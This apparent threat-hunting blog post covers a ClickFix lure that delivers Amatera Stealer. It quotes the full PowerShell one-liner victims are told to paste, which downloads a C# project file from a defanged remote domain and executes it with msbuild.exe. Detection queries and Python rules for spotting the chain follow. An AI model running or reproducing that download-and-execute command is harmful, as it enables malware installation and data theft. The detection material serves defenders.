172. Another Curious ClickFix PowerShell Command
Hello everyone!
I think everybody already knows about the ClickFix technique, but we still see new variations, especially in the command the victim is asked to paste.
Proofpoint has published a report on Amatera Stealer, and the adversary leveraged the ClickFix technique to deliver it. The victim is asked to paste the following command into the Windows Run dialog:
powershell -w h -c "$p=$env:TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -o $p;&($env:SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p"
The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and execute it with msbuild.exe.
So, as always, we can use suspicious command line arguments for detection, for example:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: (*msbuild* AND *csproj*)
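The query above, implemented as a small rule run over constructed process-creation events (an added example, not code from the post or from Proofpoint). It also adds a second, companion rule that is my own assumption: msbuild.exe itself being handed a .csproj from a temp directory, which catches the second stage even if the PowerShell launcher is written differently.

```python
import re

# Constructed process-creation events (not from the post). Event 1 mirrors
# the ClickFix one-liner with the URL kept defanged; the rest are benign or near-misses.
EVENTS = [
    {"id": 1, "event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell -w h -c \"$p=$env:TEMP+'\\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -o $p;"
                "&($env:SystemRoot+'\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe') $p\""},
    {"id": 2, "event_type": "processcreatewin", "proc_file_name": "msbuild.exe",
     "cmdline": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe C:\\Users\\bob\\AppData\\Local\\Temp\\t.csproj"},
    {"id": 3, "event_type": "processcreatewin", "proc_file_name": "msbuild.exe",
     "cmdline": "msbuild.exe C:\\src\\app\\app.csproj /t:Build"},          # normal developer build
    {"id": 4, "event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell -c \"Get-Process msbuild\""},                  # msbuild but no csproj
    {"id": 5, "event_type": "processcreatewin", "proc_file_name": "cmd.exe",
     "cmdline": "cmd /c msbuild.exe C:\\src\\app\\app.csproj"},            # not powershell.exe
]

def rule_powershell_msbuild_csproj(ev):
    """The post's rule: powershell.exe whose command line names msbuild and a csproj."""
    if ev["event_type"] != "processcreatewin" or ev["proc_file_name"].lower() != "powershell.exe":
        return False
    c = ev["cmdline"].lower()
    return "msbuild" in c and "csproj" in c

# Assumed temp locations for the companion rule; extend to match your environment.
TEMP_CSPROJ = re.compile(r"\\(?:appdata\\local\\temp|windows\\temp)\\\S*\.csproj", re.I)

def rule_msbuild_project_from_temp(ev):
    """Companion rule (my assumption, not from the post): msbuild.exe building a .csproj
    that lives in a temp directory, i.e. the second stage of the chain described above."""
    if ev["event_type"] != "processcreatewin" or ev["proc_file_name"].lower() != "msbuild.exe":
        return False
    return TEMP_CSPROJ.search(ev["cmdline"]) is not None

def detect(events):
    """Return (event id, rule name) pairs for every event any rule matches."""
    rules = {"powershell_msbuild_csproj": rule_powershell_msbuild_csproj,
             "msbuild_project_from_temp": rule_msbuild_project_from_temp}
    return [(ev["id"], name) for ev in events for name, rule in rules.items() if rule(ev)]

if __name__ == "__main__":
    for ev_id, rule_name in detect(EVENTS):
        print(f"event {ev_id}: matched {rule_name}")
```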
See you tomorrow!